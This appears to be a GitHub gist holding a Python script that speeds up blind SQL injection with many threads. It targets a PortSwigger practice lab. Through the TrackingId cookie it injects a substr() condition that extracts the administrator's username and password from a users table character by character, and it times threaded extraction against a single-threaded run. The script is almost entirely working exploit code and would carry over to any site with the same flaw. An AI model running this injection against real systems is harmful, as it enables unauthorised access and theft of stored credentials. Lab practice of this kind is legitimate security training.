Last active
April 11, 2020 11:40
-
-
Save Grezzo/6fc760b96a60a61220fa1cbe718f44cc to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import threading | |
def do_sql_injection(charset, length, function):
    """Uses *many* threads to conduct a blind SQL injection attack as fast as
    possible.

    One thread is started for every (index, candidate character) pair, all of
    them are started before any is joined, and the function returns once every
    thread has finished.

    Positional arguments:
    charset -- The candidate characters to submit to each index; iterated
               exactly once, so any iterable is accepted
    length -- The length of the value to be extracted
    function -- A callable invoked as function(char, index) that returns a
                truthy value when char is the character at the zero-based
                index, and a falsy value otherwise

    Returns the extracted string. An index for which no candidate matched
    contributes an empty string. When several candidates match the same index
    (for example because the server compares case-insensitively), the one
    that appears first in charset is chosen, so the result does not depend on
    which thread happens to finish last.
    """
    candidates = list(charset)

    # hits[index][position] is written by exactly one thread, so no two
    # threads ever compete for the same slot.
    hits = [[False] * len(candidates) for _ in range(length)]

    def _check(index, position):
        if function(candidates[position], index):
            hits[index][position] = True

    threads = []
    for index in range(length):
        for position in range(len(candidates)):
            thread = threading.Thread(target=_check, args=(index, position))
            thread.start()
            threads.append(thread)
    for thread in threads:
        thread.join()

    # Resolve each index to its first matching candidate (or '' if none).
    extracted = []
    for row in hits:
        matches = (char for char, hit in zip(candidates, row) if hit)
        extracted.append(next(matches, ''))
    return ''.join(extracted)
def main():
    """Demonstrate do_sql_injection() against a blind SQL injection lab.

    Three timed runs are performed and their results printed:
    1. the administrator password via do_sql_injection(), drawing each
       character on the terminal as soon as it is found;
    2. the same extraction with a plain nested loop on a single thread,
       followed by the speed-up ratio between the two;
    3. the username and the password at the same time, each extracted by its
       own do_sql_injection() call running in a separate thread.

    The target is the blind SQL injection lab provided by PortSwigger, see
    https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses
    """
    from datetime import datetime as dt
    import requests
    import string
    import sys

    url = ('https://[redacted].web-security-academy.net')
    # Size of the page without any injection; a larger response is treated
    # as "the injected condition was true".
    baseline = len(requests.get(url).content)

    def display_placeholder(length):
        # Red underscores, one per unknown character, then return the cursor
        # to the start of the line so characters can be drawn over them.
        sys.stdout.write('\x1b[31m{}\x1b[0m\r'.format('_' * length))
        sys.stdout.flush()

    def display_char(char, index):
        # Move the cursor right `index` columns, print the character in
        # green, and return to the start of the line.
        sys.stdout.write('{}\x1b[32m{}\x1b[0m\r'.format('\x1b[C'*index, char))
        sys.stdout.flush()

    def is_char_at_index(char, index, column, live_results):
        """Return True if `char` is at zero-based `index` of the
        administrator's `column` value, False otherwise.

        The condition is injected through the TrackingId cookie. When
        `live_results` is true, a matching character is also drawn on the
        terminal at its position."""
        # index+1 because the injected substr() call is given a 1-based
        # position while callers count from zero.
        injection = (
            "'OR(SELECT substr({},{},1)FROM users WHERE "
            "username='administrator')='{}").format(column, index+1, char)
        cookies = {'TrackingId': injection}
        response = requests.get(url, cookies=cookies)
        matched = len(response.content) > baseline
        if matched and live_results:
            display_char(char, index)
        return matched

    def is_username_char_at_index(char, index):
        return is_char_at_index(char, index, 'username', False)

    def is_password_char_at_index(char, index):
        return is_char_at_index(char, index, 'password', False)

    def is_password_char_at_index_live(char, index):
        return is_char_at_index(char, index, 'password', True)

    # Lengths of the values being extracted; fixed for this lab.
    password_length = 6
    username_length = 13
    charset = string.ascii_letters + string.digits

    # Run 1: password via do_sql_injection(), with live display.
    print('Starting operation using do_sql_injection()')
    display_placeholder(password_length)
    start = dt.now()
    result = do_sql_injection(
        charset, password_length, is_password_char_at_index_live)
    print()
    end = dt.now()
    dsi_time = end - start
    print('Result is {}'.format(result))
    print('Operation took {}\n'.format(dsi_time))

    # Run 2: the same extraction, one request at a time.
    print('Starting operation using single thread')
    display_placeholder(password_length)
    start = dt.now()
    found_chars = []
    for index in range(password_length):
        for char in charset:
            if is_password_char_at_index_live(char, index):
                found_chars.append(char)
                # Stop probing this index once its character is known.
                break
    result = ''.join(found_chars)
    print()
    end = dt.now()
    st_time = end - start
    print('Result is {}'.format(result))
    print('Operation took {}\n'.format(st_time))
    print('do_sql_injection was {} times faster!\n'.format(st_time/dsi_time))

    # Run 3: username and password concurrently, without live display.
    print((
        'Getting two fields at the same time using threads around '
        'do_sql_injection()'))
    fields = {'username': None, 'password': None}

    def get_password():
        fields['password'] = do_sql_injection(
            charset, password_length, is_password_char_at_index)

    def get_username():
        fields['username'] = do_sql_injection(
            charset, username_length, is_username_char_at_index)

    threads = [
        threading.Thread(target=get_password),
        threading.Thread(target=get_username)]
    start = dt.now()
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
    end = dt.now()
    both_time = end - start
    print(fields)
    print('Operation took {}\n'.format(both_time))
# Run the demonstration only when this file is executed as a script, so that
# importing the module does not trigger any requests.
if __name__ == '__main__':
    main()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment